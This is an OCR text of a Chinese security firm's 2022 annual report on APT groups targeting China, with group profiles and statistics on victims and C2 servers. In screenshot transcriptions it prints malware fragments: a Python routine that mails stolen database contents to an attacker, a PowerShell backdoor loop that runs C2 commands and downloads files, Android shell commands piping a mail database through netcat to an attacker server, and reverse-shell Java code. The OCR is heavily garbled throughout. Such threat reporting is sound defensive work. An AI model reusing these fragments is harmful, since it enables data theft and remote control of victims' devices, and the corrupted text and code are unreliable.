M 


| DAE : Ñ; "Y Z I 

| N *- £f ] | 

| y ss 全 Poscums 
< MEAM sm Ae: < 


[NORWAY] > AN T T -o Vyborg 


i 


RUSSIA 


© 


SE POLAND- 


全 球 高 级 持续 性 威胁 (APT) 


2022 年 度 报告 


2023 年 02 月 


OPE ET 


主要 观点 / 全 球 高 级 持续 性 威胁 (APT) 2022 年 度 报告 《te 》 奇 安信 威胁 情报 中 心 


ERMA 


y 政府 部 门 仍 是 APT 组 织 的 首要 攻击 目标 , 其 次 是 国防 军事 行业 , 与 之 相关 的 攻击 活动 非常 活跃 。 此 外 ， 
金融 贸易 、 能 源 、 科 技 、 新 闻 媒 体 等 行业 也 成 为 2022 年 APT 活动 关注 的 热点 。 


4 2022 年 ， 依 然 有 不 少 针 对 中 国 的 APT 攻击 活动 以 鱼 叉 邮件 作为 初始 入 侵 手 段 ， 部 分 APT 组 织 在 攻 
击 活动 中 还 使 用 了 Oday 漏洞 。 国 内 受害 目标 涉及 政府 、 军 工 、 能 源 行业 等 重点 单位 ， 以 及 医疗 、 金 融 、 
科技 等 诸多 领域 ， 此 外 我 们 还 观察 到 一 些 APT 组 织 针对 我 国企 业 在 海外 资产 的 定向 攻击 活动 。 


4 2022 年 ， 全 球 APT 活动 呈现 出 六 大 特点 : 受 经 济 利益 驱使 ， 金 融 行业 遭受 的 攻击 加 剧 ; 针对 国防 
军事 和 能 源 行业 的 攻击 较 去 年 增多 ;通过 漏洞 作为 突 防 利用 的 方式 仍 受 攻击 者 欢迎 ; 鱼 叉 邮 件 仍 然 是 最 
主要 的 载荷 投递 方式 ，Lnk 快捷 方式 文件 被 大 量 用 于 部 署 攻 击 载荷 } 遭受 攻击 的 目标 平台 趋 于 多 元 化 。 


^ 国防 军事 、 金 融 商 贸 、 区 块 链 、 能 源 等 行业 成 为 2022 年 APT 活动 关注 的 新 兴 热 点 ， 发 生 了 多 起 影 
响 重 大 的 APT 攻击 事件 。 


4 2022 年 0day 漏洞 的 攻击 使 用 整体 趋 于 缓和 ， 比 之 2021 年 有 大 幅 下 降 ， 但 同比 2020 年 的 0day 在 
野 漏 洞 攻击 依然 有 所 增加 。 在 野 0day 漏洞 的 平台 分 布 呈 三 足 易 立 的 趋势 ， 微 软 、 谷 歌 、 苹 果 ， 作 为 当 
今 三 个 最 大 的 软件 平台 提供 商 ,其 产品 的 在 野 0day 漏洞 数量 占据 全 年 所 有 在 野 0day 数量 近 9 成 , 谷歌 、 
微软 相关 产品 的 在 野 0day 漏洞 分 别 高 达 11 和 12 个 。 


CERTUM, Æ 2023 t£, APT 活动 将 呈现 出 如 下 四 大 趋势 : 受 地 缘 政治 冲突 影响 ，APT 攻击 活动 持 


续 加 剧 ; 对 受害 国 本 土 软件 的 漏洞 利用 愈加 频繁 ; 瞄准 关键 基础 设施 的 破坏 越发 泛 小 各 类 新 型 钓鱼 攻 
击 活动 将 频繁 出 现 。 
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4 2022 年 ， 奇 安信 威胁 情报 中 心 使 用 奇 安信 威胁 雷达 对 境内 的 APT 攻击 活动 进行 了 全 方位 遥感 测绘 。 
监测 到 我 国 范围 内 大 量 IP 地 址 与 数 十 个 境外 APT 组 织 产 生 过 高 危 通信 ， 疑 似 被 攻击 。 作 为 政治 中 心 的 
北京 和 沿海 省 份 广东 、 上 海 、 浙 江 、 江 苏 等 地 是 境外 APT 组 织 攻击 的 主要 目标 地 区 ， 福 建 、 安 徽 等 东部 
地 区 也 有 较 多 受害 目标 。 


S 基于 奇 安信 威胁 雷达 的 测绘 分 析 ，2022 年 ，APT-Q-27、 海 莲花 、 毒 云 藤 、 葛 灵 花 、APT-Q-22、 
Lazarus 等 组 织 , 是 对 我 国 攻击 频率 最 高 、 危 害 最 大 的 APT 组 织 。 我 国境 内 受 其 控制 的 IP 地址 比例 分 别 为 : 
APT-Q-27 22%， 海 莲花 17%, $727k 1690, APT-Q-22 13%, RTE 996, Lazarus 8%。 


y 本 次 报告 通过 综合 分 析 奇 安信 威胁 雷达 测绘 数据 、 奇 安信 红 雨 滴 团队 对 客户 现场 的 APT 攻击 线索 排 
查 情 况 以 及 奇 安 信 威 胁 情报 支持 的 全 线 产品 告警 数据 ， 得 出 以 下 结论 : 2022 年 ， 我 国政 府 部 门 、 金 融 
商贸 、 科 研 机 构 遭 受 高 级 威胁 攻击 突出 ， 受 影响 的 行业 排名 前 五 分 别 是 : 政府 29%， 人 金融 商贸 14%, 
科研 12%， 能 源 9%， 医 疗 9%。 


4 2022 年 ， 奇 安信 威胁 情报 中 心 收录 了 331 篇 高 级 威胁 类 公开 报告 ， 涉 及 137 个 已 命名 的 攻击 组 织 
或 攻击 行动 。 其 中 , 提 六 率 最 高 的 五 个 APT 组 织 分 别 是 : Lazarus 8.796, Kimsuky 5.096, 透明 部 落 4.5%, 


— 十 上 


Gamaredon 3.6%， 海 连 花 3.3%。 


£; 政府 部 门 和 国防 军事 行业 仍 是 2022 FER APT 活动 关注 的 首要 目标 ， 紧 随 其 后 的 是 科技 、 能 源 、 
金融 商贸 、 新 闻 媒 体 等 领域 。 


4 2022 年 奇 安信 威胁 情报 中 心 独 家 捕获 6 个 针对 国产 软件 的 在 野 Oday 漏洞 ， 这 些 漏洞 被 境外 APT 组 
织 在 针对 国内 目标 的 攻击 活动 中 使 用 。2022 年 全 球 范围 内 0day 漏洞 的 使 用 趋 于 缓和 ， 比 之 2021 年 有 
大 幅 下 降 ， 但 同比 2020 年 的 0day 在 野 漏 洞 攻击 依然 有 所 增加 ， 在 野 攻击 涉及 重要 漏洞 数量 超 35 个 。 
以 浏览 器 为 核心 的 漏洞 攻击 向 量 仍然 是 主流 趋势 ， 其 中 不 少 新 增 在 野 0day 漏洞 是 因 之 前 的 漏洞 没有 完 
全 修复 或 修复 机 制 存在 被 绕 过 的 问题 导致 。 


关键 字 : 全 球 高 级 持续 性 威胁 、APT、0day、 国 产 化 、 政 府 部 门 、 威 胁 雷达 、 浏 览 
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第 一 章 中 国境 内 高 级 持续 性 威胁 综述 


基于 中 国境 内 海量 DNS 域名 解析 和 奇 安信 威胁 情报 中 心 失陷 检测 (I0C) 库 的 碰撞 分 析 ( 奇 安信 威胁 雷 


达 ) ， 是 了 解 我 国境 内 APT 攻击 活动 及 高 级 持续 性 威胁 发 展 趋势 的 重要 手段 。 


奇 安信 威胁 情报 中 心 通过 使 用 奇 安信 威胁 雷达 对 境内 的 APT 攻击 活动 进行 了 全 方位 遥感 测绘 ， 监 测 到 我 
EH AAKE IP 地址 疑似 和 数 十 个 境外 APT 组 织 产 生 过 高 危 通 信 。 作为 政治 中 心 的 北京 和 沿海 省 份 广东 、 
上 海 、 浙 江 、 江 苏 等 地 是 境外 APT 组 织 攻 击 的 主要 目标 地 区 。 


本 章 内 容 及 结论 主要 基于 奇 安信 威胁 雷达 数据 、 奇 安信 红 雨 滴 团队 在 客户 现场 处 置 排查 的 真实 APT 攻击 
事件 ， 结 合 使 用 了 奇 安 信 威 胁 情报 的 全 线 产品 告警 数据 ， 进 行 的 整理 与 分 析 。 


一 、 奇 安信 威胁 雷达 境内 遥测 分 析 


奇 安 信 威 胁 雷达 是 奇 安 信 威 胁 情报 中 心 基于 奇 安信 大 网 数据 和 威胁 情报 中 心 失 陷 检 测 (IOC) 库 ， 用 于 
监控 全 境 范 围 内 疑似 被 APT 组 织 、 各 类 僵 木 里 控制 的 网 络 资产 的 一 款 威 胁 情报 SaaS 应 用 。 通 过 整合 奇 安 
信 的 高 、 中 位 威胁 情报 能 力 ， 发 现 指定 区 域内 疑似 被 不 同 攻击 组 织 或 恶意 软件 控制 的 主机 IP， 了 解 不 同 
威胁 类 型 的 比例 及 被 控 主 机 数量 趋势 等 。 可 进一步 协助 排查 重点 资产 相关 的 APT 攻 击 线索 。 


会 全国 城 市 全 境 受害 者 数据 分 析 e 


d 


< BRE 


&| 1.1 奇 安信 威胁 雷达 境内 受害 者 数据 分 析 


1 2022 FERS 


«9» 奇 安信 威胁 情报 中 心 
基于 奇 安信 威胁 雷达 境内 的 遥测 分 析 ， 我 们 从 以 下 方面 对 我 国境 内 疑似 遭受 的 APT 攻 击 进行 了 分 析 和 统 


计 。 


seit IP 数量 和 趋势 


奇 安信 威胁 情报 中 心 基于 威胁 雷达 在 2022 年 监测 到 数 十 个 境外 APT 组 织 针对 我 国 范围 内 大 量 目标 IP 进 行 
通信 ， 形 成 了 大 量 的 境内 1IP 与 特定 APT 组 织 的 网 络 基础 设施 的 高 危 通信 事件 。 其 中 还 存在 个 别 APT 组 织 
通过 多 个 C2 服务 器 与 同一 IP 通 信 的 情况 。 


下 图 为 2022 年 奇 安信 威胁 雷达 遥测 感知 的 我 国境 内 每 月 连接 境外 APT 组 织 C2 服 务 器 的 疑似 受害 IP 地 址 数 


量 统计 ， 可 以 看 出 ， 攻 击 高 峰 为 年 中 、 年 末 两 个 时 期 ， 且 年 中 5、6 月 份 的 攻击 次 数 明显 高 于 其 他 时 期 ， 
6 月 份 境内 疑似 受 控 的 IP 数 量 甚至 达到 了 12 月 的 2 倍 。 下 半年 境外 APT 攻 击 团伙 的 攻击 较 上 半年 活跃。 


2022 年 中 国境 内 疑似 受 控 1P 数 量 月 度 分 布 OI E 


1H 2H 3H 4H 5H 6H 7H 8H 9 月 10H 11H 12H 


A. 图 1.22022 年 中 国境 内 疑似 受 控 1P 数量 月 度 分 布 


2022 年 中 国境 内 每 月 新 增 疑似 被 境外 APT 组 织 控 制 的 IP 数 量变 化 趋势 如 图 1.3 所 示 ， 反 映 了 APT 组 织 攻击 
活跃 度 变化 走向 。 新 增 受 控 IP 数 量变 化 趋势 也 与 图 1.2 中 每 月 连接 境外 APT 组 织 C2 服 务 器 的 疑似 受害 IP 数 
量 分 布 相符 ， 可 以 看 到 疑似 受 控 IP 数 量 存在 新 增 的 并 不 多 ， 仅 5 月 、6 月 新 增 明显 。 
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2022 年 中 国境 内 每 月 新 增 疑 似 受 控 1P 数 量变 化 趋势 《es > 奇 安信 


1 月 2H 3 月 4H 5 月 6 月 7 月 8 月 9 月 10H 11 月 12 月 


全 图 1.3 2022 年 中 国境 内 每 月 新 增 疑似 受 控 IP 数量 变化 趋势 


受害 目标 区 域 分 布 

下 图 为 2022 年 中 国境 内 疑似 连接 过 境外 APT 组 织 C2 服 务 器 的 IP 地 址 地 域 分 布 ， 分 别 展示 了 各 省 疑似 受害 
IP 地 址 的 数量 : 可 以 看 到 作为 政治 中 心 的 北京 和 沿海 省 份 广东 、 上 海 、 浙 江 、 江 苏 等 地 是 境外 APT 组 织 
攻击 的 主要 目标 地 区 ， 福 建 、 安 徽 等 东部 地 区 也 存在 较 多 受害 目标 。 


2022 年 中 国境 内 疑似 受 控 IP 地 域 分 布 Top10 NO) Ei 


北京 广东 上海” 福建” 安徽 ”江苏 ”浙江 陕西 辽宁 江西 


全 图 1.42022 年 中 国境 内 疑似 受 控 1P 地 址 地 域 分 布 
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APT 组 织 资产 分 布 


下 图 分 别 为 2022 年 境外 APT 组 织 疑似 控制 我 国境 内 目标 IP 数量 占 比 以 及 境外 APT 组 织 疑 似 使 用 过 的 
C2 服务 器 数量 分 布 。 


2022 年 APT 组 织 控制 境内 IP 数 量 占 比 及 C2 服 务 器 数量 分 布 《fe > 奇 安信 


APT 组 织 控制 境内 IP 数 量 占 比 C2 服 务 器 所 属 团伙 数量 分 布 
摩 词 草 3% . APT-Q777 Kimsuky 3% -AEA 
Winnti 5% 2% 2% 


Winnti 4% 
其 他 5% 其 他 4% — 


22% 25% 
Lazarus 8% EXE 8% UN 
SERIE 9% "K 
I Lazarus 10% 海 莲 花 


APT-Q-22 
16% 


13% 


会 图 1.5 2022 年 APT 组 织 控制 境内 IP 数量 占 比 及 C2 服务 器 所 属 团伙 数量 分 布 


可 以 看 出 ，APT-Q-27、 海 莲花 、 毒 云 膝 、 萝 灵 花 、APT-Q-22、Lazarus 等 APT 组 织 疑似 控制 了 境内 大 部 
分 IP 地 址 。 这 些 组 织 主 要 潜伏 在 我 国 周 边 国家 和 地 区 ， 其 中 海 莲花 和 毒 云 膝 长 期 以 来 一 直 针 对 中 国 ， 作 
为 我 们 面临 的 主要 网 络 威胁 之 一 ， 其 在 2022 年 仍 围 绕 我 国 目标 频繁 发 起 攻击 活动 。 
进一步 对 这 些 APT 组 织 的 C2 服务 器 及 其 控制 的 境内 IP 地 址 数据 分 析 后 ， 我 们 发 现 : 


1. APT-Q-27 攻 击 峰值 出 现在 5 月 ， 此 后 攻击 频率 昌 有 所 降低 ， 但 依旧 明显 高 于 5 月 前 ， 上 图 表明 其 拥有 庞 
大 的 网 络 基础 设施 。 


2. 海 过 人 花 和 毒 云 芯 组 织 的 攻击 存在 年 中 、 年 末 两 个 明显 的 高 峰 期 ， 并 通过 大 量 C2 服 务 器 与 境内 IP 进 行 过 


通信 。 


3. APT-Q-22、 茵 灵 花 、Lazarus、Winnti、 摩 启 草 、 海 莲花 、APT-Q-77 这 几 个 组 织 整 个 下 半年 均 保 持 较 
高 的 活跃 度 ， 其 中 APT-Q-22 和 APT-Q-77 使 用 了 少量 C2 进行 批量 攻击 。 
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除了 上 图 提 到 的 这 些 组 织 ，NSA 旗 下 的 “方程 式 ”组 织 也 在 2022 年 对 我 国 重要 基础 设施 发 起 了 多 次 大 规 
模 的 网 络 攻 击 活动 ， 窃 取 重 要 敏感 数据 。NSA 长 期 针对 全 球 主要 国家 和 地 区 实施 绝密 电子 监听 计划 ， 而 
-方程式 ” 组 织 正 是 此 项 全 球 电 子 监 听 计 划 的 主要 行动 者 之 一 。 


二 、2022 年 紧 盯 我 国 的 活跃 组 织 


2022 年 ， 针 对 中 国 的 APT 组 织 仍 有 不 少 以 鱼 叉 邮 件 作 为 初始 入 侵 手 段 ， 部 分 APT 组 织 在 攻击 活动 中 还 
使 用 了 0day 漏洞 。 国 内 受害 目标 涉及 政府 、 军 工 、 能 源 等 行业 的 重点 单位 ， 以 及 医疗 、 金 融 、 科 技 等 
诸多 领域 ， 此 外 我 们 还 观察 到 一 些 APT 组 织 针对 我 国企 业 在 海外 资产 的 定向 攻击 。 


奇 安信 威胁 情报 中 心 通过 奇 安信 红 雨 滴 团 队 和 奇 安信 安 服 在 客户 现场 处 置 排查 的 真实 APT 攻击 事件 ， 结 
合 使 用 了 威胁 情报 的 全 线 产 品 告警 数据 ， 最 终 基于 被 攻击 单位 、 受 控 设备 、APT 组 织 技 战术 等 多 个 指标 
筛选 出 以 下 数 个 对 我 国 攻 击 频 率 高 或 危害 大 的 APT 组 织 。 

接 下 来 ， 我 们 将 结合 奇 安 信 红 雨滴 团队 的 真实 APT 攻击 处 置 案例 ， 逐 一 盘点 2022 年 紧 盯 我 国 的 全 球 
APT 组 织 。 

APT-Q-31 ( 海 莲花 ) 

关键 词 : 跳板 、0day 漏洞 

海 莲花 在 2022 年 的 疯狂 攻击 活动 一 直 持 续 到 《Operation(Dudng chín doan) typhoon: MALA SLE 
线 的 赛 博 海 功 》5 一 文 的 发 表 ， 之 后 活动 频率 又 减 。 攻 击 者 舍弃 了 国内 大 量 的 存活 跳板 和 代理 ， 使 用 第 
ZA VPN 进行 前 期 侦察 。 可 能 由 于 经 费 等 原因 ， 海 莲花 开始 启用 之 前 曾 作 为 跳板 后 置 C2 的 网 络 基础 设 
施 ， 并 持续 对 我 国 重点 单位 在 中 国 香港 的 分 公司 进行 攻击 。 临 近年 末 我 们 观察 到 海 莲 花 疑 似 使 用 未 知 的 
0day 漏洞 在 中 国 大 陆 进行 网 络 渗透 攻击 活动 。 


奇 安信 威胁 情报 中 心 将 持续 对 海 莲 花 的 活动 进行 监控 。 


BlackTech 


关键 词 : 渗透 、 金 融 、 科 技 
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BlackTech 在 过 去 三 年 间 持续 对 我 国 金融 行业 和 科技 领域 进行 攻击 ， 使 用 plead 家 族 木马 投递 诸如 “ 运 
维 材料 20211028.xlsx.exe” 等 类 型 的 样本 ， 驻 留成 功 后 会 释放 plead 家 族 变 种 ， 通 过 读 文件 来 加 载 后 


续 Payload。 


strcpy(FileName， 
FileName[19] = 9; 
memset(v13, 0, OxF4u); 


© O 


Ww N h- 


+ 


e 


Buffer - sub 42 í 
v7 = sub_40ABFB( Buffer); 


O O0 +J 


> 


< 


J N ec 


2 
2 
2 
2 
2 
2 
2 
25 
2 
2 
= 
2 
s 
2 
= 
2 
3 
3 
3 
s 


 AFX OLE STATE:: AFX OLE STATE(( AFX OLE STATE *)v8); 
LOBYTE(v14) 3 

jC1(v6); 

5, V7 - Vil v4, v11); 
Stringl = aUpdate; 
sub 40CBC1(v6); 
v9 = (int)inject(v5); 


其 释放 的 样本 文件 均 带 有 数字 签名 。 
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数字 签名 详细 信息 ? Xx 
SH SR 


三 少数 字 签 名 信息 
= 此 数字 签名 正常 。 


签名 者 信息 (S) 


名 称 : [一 


电子 邮件 : 不 可 用 


签名 时 间 : |zo19 年 7 月 19 日 16:12:17 


aSU) 
签名 者 姓名 : 电子 邮件 地 址 : ” 时间 歌 


— u-— Ë HÉ E mmm Ü" m m 


A. 图 1.7 正规 数字 签名 截 


[网 


在 通过 横向 移动 拿 到 金融 企业 数据 库 账 号 密码 后 ， 下 发 由 Python 编写 的 邮件 发 送 模块 ， 将 数据 库 中 的 数 
据 打 包 后 通过 邮件 发 送 到 攻击 者 的 Outlook 或 者 ProtonMail 邮 箱 中 。 


-— 

message 
message[ 
message[ 


] = format address('abc <%s>' % from address) 
= (C. C).jein(te address) 


message['Subject'] = Header(datetime.datetime.now().strftime('$Y-$m-*d $H:3M:33'), 'utf-0' ) -encode () 
'utf-B') 
attl[' nt-Disposition'] = 'attachment; fi "$s"' % filepath 


message.attach(attl) 
try: 
server — smtplib.SMTP SSL(smtp server, 465) 
server.login(from address, password) 
server.sendmail(from address, to address, message.as string()) 
print 'sendok' 
server.quit() 
except smtplib.SMTPException: 
print 'senderr' 


conn = pymysqi. connect (host nost, Port port, user-user, passwd-passwd, db-db 
cur = conn.cursor() 
cur.execute (sql) 
with codecs.open(outfile, 'w', 'utf-8') as (f): 
for data in cur.fetchall(): 
f.write(str(data) + 'in') 


» 
Ñ 


到 1.8 Python 插件 代码 截 


网 


除 此 之 外 我 们 还 发 现 BlackTech 非 常 喜欢 使 用 plink 工 具 将 内 网 服务 器 特定 端口 映射 到 攻击 者 的 服务 器 
iles 
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«(e 奇 安信 威胁 情报 中 心 


Berberoka 


关键 词 : 僵尸 网 络 、 博 彩 、 科 技 、 游 戏 、 医 院 

最 近 几 年 ， 我 们 一 直 对 Berberoka 团伙 保持 高 强度 的 跟踪 ， 经 过 研判 发 现 该 团伙 与 TAG33 和 
DRBControl 等 组 织 同 源 ， 为 了 不 造成 不 必要 的 麻烦 ， 我 们 沿用 友 商 的 命名 Berberoka。 该 团伙 在 2021 
上 半年 入 侵 了 国内 多 家 重点 医院 ， 通 过 DNS 隧道 投递 Cobalt Strike 木马 实现 远程 控制 。 在 横向 移动 过 
程 中 使 用 了 隧道 代理 和 自己 编写 的 免 杀 Loader， 最 终 成 功 获 取 到 医院 数据 库 的 账号 密码 ， 并 通过 固定 
的 SQL 语句 对 数据 进行 加 密 打 包 。 除 此 之 外 ,该 团伙 还 会 入 侵 国内 的 科技 、 游 戏 等 公司 以 牟取 经 济 利益 。 
在 有 些 攻击 场景 下 还 会 入 侵 国内 正常 网 站 ， 向 网 站 上 传经 过 MSI 打包 的 ServantShell 木马 用 作 第 二 阶 
段 的 Payload。 


ww hbawyer.net - /images/ 


To Parent Directory] 


2019/9/26 11:05 331851 443. jpg 
2017/2/13 17:51 443325 ab ad. jpg 
2017/2/13 17:51 27138 ab bg. jpg 
2018/3/28 20:42 79102 ab coll. jpg 
2018/3/28 21:05 100842 ab col2. jpg 
2017/2/13 17:51 760091 about banner. jpg 
2017/2/13 11:51 5194 client. jpg 
2017/2/13 17:51 189 close. png 
2017/2/13 17:51 173692 com map. jpg 
2017/2/13 17:51 80076 companyl. jpg 
2017/2/13 17:51 62957 company2. Jpg 


A 图 1.9 被 入 侵 站 点 Opendir 截 


R 


在 2022 年 上 半年 我 们 观察 到 有 大 量 的 家 庭 宽 带 IP 回 连 Berberoka 组 织 的 C2， 经 过 分 析 发 现 大 部 分 受害 者 
IP 均 为 路 由 器 ， 在 该 事件 中 攻击 者 入 侵 了 国内 某 计 算 机 网 络 公司 ， 将 第 二 阶段 样本 挂 在 该 公司 官网 上 。 
基于 奇 安信 威胁 情报 中 心 僵尸 网 络 威胁 检测 系统 关联 发 现 Berberoka 组 织 似乎 与 XorDDoS 伪 尸 网 络 有 
关 。 


APT37 


关键 词 : 跳板 、 钓 鱼 邮件 

APT37 主要 针对 某 些 在 华 亚 裔 外 国人 及 我 国 东 南 沿 海 省 份 进行 攻击 ， 通 过 入 侵 韩 国 或 者 中 国 的 网 站 并 在 
网 站 某 个 目录 下 上 传 钓 鱼 攻击 框架 或 者 C2 命令 控制 ) 框架 来 实现 在 不 同 场景 下 的 攻击 目的 。 相 关 钓 
鱼 站 点 如 下 : 
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€ > X Q A 不 安全 | mma mcum mese mwa mam JISGrFXdatrihVcflBMULSXKULgdpiweA6g2KQVmi4i6pv1rUD5GSVO0vuwfj4&i= = me 


Ae | PSS vip 


EAE App 


A. 图 1.10APT37 钓鱼 页 面 展示 


反复 输入 四 五 次 账号 密码 后 ， 会 跳 转 到 云 盘 页 面 ， 提 供 正常 文档 的 下 载 。 


Ready when you are 


Transfer expires in 3 days 


ZA|9F4.doc 


7j 9tA4.doc 
77 KB - doc © 


全 图 1.11 云 盘 链接 截图 


o o 
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== 
忆 


SIE 


[ys 


有 时 我 们 发 现 攻击 者 会 在 云 盘 上 投放 带 有 


«(9 奇 安信 威胁 情报 中 心 


CHM 样 本 的 ZIP 文 件 ，CHM 文 件 打开 后 的 内 容 如 下 : 


$a gEGISRESHIAI RESAS FAI YFA SE GAHA NI AJ ASEAS TUSEA SIS] ejeloj Sa] ez gac NANA glei^ler?te SSo| 刑 引 寺 UI 
e. 
宇 引 BAE mm Se dass sese SE EADE = AoH Sa SAE Us gs, Seddge EIES UE RUE EAE ADDASU. 


zeros AFSO| 208/9| 212Fep oleo |ero| SFE Ape E A &e0| gaps pep e| 专人 是 nasi m a e, 

Uer 肥瘦 8L AFRE, SATA, Sel? Z= NS == gA raiz ENS SAE ee s Seo 200910] 1915 UI 4000RMB.YS] HEHE A| SESEZIeJUICE. 
$23 SESS RSSHSAL Eel 
E 
202200 2 & 
ELE LIE 

Suo SEDIERESHUEA|SSESARS FUF FQ S| AFSI 车 屋 号 作怪 引 200180] ESAU TAE = EFAEALGH2I POI] A| SFO] S] A] SEES 88) SAFARAS WEE: A| LHA 

Su UY AF Og aY 31 AFAA RAMD SI ARCADE ADI S] 28 09r 2850] AEA s= =ë uw g& Sel SAPI #I# S= zgage gU 


网 
网 


1.12 CHM 木马 截 


CHM 文 件 打 开 后 会 去 执行 跳板 服务 器 上 的 轻 量 化 PowerShell 木 马 ， 
工 验证 受害 者 是 否 属于 攻击 目标 ， 验 证 完成 后 会 下 发 文件 收集 插件 ， 


通过 该 脚本 木马 ， 攻 击 者 会 先 人 


该 插件 将 PowerShell 木 马 的 协议 


和 文件 收集 功能 结合 在 一 起 ， 由 C++ 语言 编写 。 最 后 APT37 会 根据 收集 上 来 的 文件 目录 判断 是 否 下 发 


Chinotto 后 门 。 我 们 发 现 Chinotto 后 门 也 有 PowerShell 版 本 。 


newPath = Senv:APPDATA + 'Vsvchost.exe'; 
opy-Item SoldPath -Destination $newPath; 
eg (Sm=senankha - 


43 url = "m = m= = = m" — = = 
sorsas aes s DASS SCE -| uidProperty SerialNumber); 
serialNumber = $serialNumber.Replace(' ', 


resultPath = Senv:APPDATA + 'Vdesktop.dat'; 
endHttpRequst(Surl + "?type-hello&direction-sendsid-" + SserialNumber); 
hile (Strue){ 
$val = ""; 
SHTTP Request = [System.Net.WebRequest]:: 
SHTTP Response = SHTTP Request.GetResponse(); 
SHTTP Status = SHTTP Response.StatusCode; 
1f (SHTTP Status -eq 200) ( 


S$data-$readStream.ReadToEnd|(); 
if (!$data.Contains ("Fail")) 


if (S$data.Contains("ref:")) 
t 


) 

elseif (Sdata.Contains ("cmd:")) 

{ 
Invoke-Expression Sdata.Substring(4) | Out-file S$resultPath; 
uploadFile $resultPath (SserialNumber + '-result'); 

) 

elseif (Sdata.Contains ("down:")) 

1 
$fileUrl = $data.Substring(5); 
SfileName = SfileUrl.Substring(SfileUrl.LastIndexOf("/") + 1); 
Spath = Senv:APPDATA + "N" 4 S$fileName; 
(New-Object Net.WebClient).DownloadFile(SfileUrl, $path); 


) 
elseif ($data. 
{ 


Contains ("upload:")) 


SfilePath = $data.Substring(7); 
$fileName = Sdata.Substring($data.LastIndexOf("MV") + 1); 
uploadFile $filePath $fileName; 


) 


reate(Surl + "?type-command&direction-receiveside" + $serialNumber! 


SreadStream = New-Object System.IO.StreamReader SHTTP Response.GetResponseStream(); 


sendHttpRequst(Surl + "?type-hellosdirection-sendsid-" + SserialNumber); 


Sval = Surl + "?type-results&direction-sendsid-" + $serialNumber + "&data-Success"; 


Sval = $url + "?type-resultsdirection-send&id-" + S$serialNumber + "&data-Success"; 


网 


1.13 Chinotto 后 门 PowerShell 版 截 


网 


奇 安信 威胁 情报 中 心 将 会 持续 关注 APT37 在 国内 的 动向 。 


电话 : 95015 官网 : https://ti.qianxin.com 


邮箱 : ti_support@qianxin.com 
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旺 刺 (APT-Q-14) 


关键 词 : 0day、 鱼 叉 邮 件 、 安 卓 移动 端 

旺 刺 在 2022 年 仍然 保持 高 强度 的 攻击 活动 ， 通 过 投递 鱼 叉 邮 件 诱导 受害 者 下 载 第 一 阶段 的 Payload 最 
终 加 载 Saint Bot 家 族 的 木马 。 下 半年 该 组 织 开 始 在 邮件 中 投递 包含 恶意 Ink 文件 的 压缩 包 ， 从 C2 服务 
器 下 载 第 二 阶段 Payload。 


全 图 1.14Lnk 文件 结构 


并 且 我 们 首次 发 现 了 旺 刺 组 织 针 对 安 卓 移动 端的 攻击 行动 ， 其 向 重要 目标 投递 ZIP 格 式 的 dat 文 件 ， 由 于 
没有 获取 到 完整 的 攻击 链 ， 我 们 推测 攻击 者 使 用 了 某 款 安 卓 APP 解 析 漏 洞 ， 当 使 用 该 APP 打 开 如 下 文件 
时 可 能 会 导致 任意 代码 执行 。 


全 图 1.15 dat 文件 结构 


通过 提取 字符 串 发 现 该 文件 中 包含 了 一 个 curl 命 令 ， 从 C2 服 务 器 下 载 命 令 并 执行 ， 打 包 指 定安 卓 APP 目 
录 下 的 文件 并 通过 toybox 的 nc 命令 传送 到 攻击 者 的 服务 器 上 。 
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1 rm - rf / data / user / 0 / com.r&9.-&. nail / app tt pangle bykv file; 

2 touch / data / user / 0 / com.netes s 41 / app tt pangle bykv file; 

3 rm - rf / data / user / 0 / com.nz=k—= &&mail / app tt pangle bykv file; 

4 touch / data / user / 0 / com.netemsm m-»—w-il / app tt pangle bykv file; 

5 rm - rf / sdcard / Android / data / com www m» 4 / files / .update / update.apk; 
6 

T 

8 

9 


mkdir - p / sdcard / Android / data / com." gw» «mil / files / .update / update.apk / test; 


VER = “getprop ro.build.version.release'; 
) if ["SVER" = "11" - o "SVER" < "12": 
then if [-e "/data/user/0/com. sem. waw kall mmm 5umail.7"]; 
I0 then sleep 3 | tar - cvz / dava / user 7 ú / com.me-w-.mail / databases / mmail.7 | toybox nc š E 
| HT 
[2 if [-e "/data/user/0/com. meme „E * L] sma 7"]; 
3 then sleep 3 | tar - cvz / d&ta / üsef 7 U / com. Nn Bobimail / databases / mmail.7 | toybox Mi B 
ri; 
5 elif["SVER" = "9" - o "SVER" = "10"1l: 
L6 then if [-e "/data/user/0/com- mm a m——m-:/mmail.7"1: 
7 then sleep 3 | tar - cvz / Gata ; üser 7 0 7 COM mow” ma "atabases / mmail.7 | toybox nc L] Li 
B fi; 
9 if [-e "/data/user/0/cUN. Ea Ross E - - wm. ERil.7"); 
Ü then sleep 3 | tar - c73 » dace / user / 0 4 m bu mm Èb üm i WSs / mmail.7 | toybox Ac Bo = pU: 
|^ HL 
EESTI 


» 
Ñ 


到 1.16 安 卓 机 器 执行 的 命令 


之 后 还 会 执行 一 个 APK 木 马 。 


public static void main(String[] arg1) { 
new Thread() ( 

public void run() ( 
OutputStream v13; 
OutputStream v7; 
InputStream v10; 
InputStream v4; 
InputStream v5; 
Process v9; 
Socket v11; 
String vie ==="; 
int = mmm 
String v8 = "/bin/sh"; 
Socket v12 = null; 


tyi 
while(true) ( 
label 5: 
v11 - new Socket(); 
break; 
1 
) 
catch(IOException v8) ( 
v11 = v12; 
goto label 57; 
} 
try { 


v11.connect(new InetSocketAddress(v1, v5); 
goto label 10; 


) 
catch(IOException v@) ( 
) 


» 
四 


1.17 APK 木马 代码 截 


内 


除 此 之 外 ， 在 钓鱼 攻击 方面 ， 旺 刺 和 虎 木 樟 (APT-Q-11) 在 2022 年 下 半年 各 使 用 了 一 个 针对 国产 软件 
的 0day 漏 洞 ， 只 需 点 击 链接 即 可 窃取 受害 者 的 赁 证， 无需 受害 者 主动 输入 账号 密码 ， 极 大 的 提高 了 定向 
钓鱼 攻击 的 成 功率 。 


(Cz3 未知 组 织 (APT-Q-XX) 
关键 词 : 鱼 又 邮件 、 热 点 时 政 


在 2022 年 ， 我 们 发 现 了 一 个 新 的 团伙 ， 发 件 域名 仿造 为 国际 战略 、 主 流 媒体 等 机 构 的 域名 ， 向 国内 研 
究 人 员 投 递 钓鱼 邮件 ， 邮 件 发 件 IP 为 路 由 器 跳板 和 VPN; 
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2022/11/10 (AM) 11:30 
LE | ipei | ? 
亚太 政策 分 析 资 料 

收 件 人 

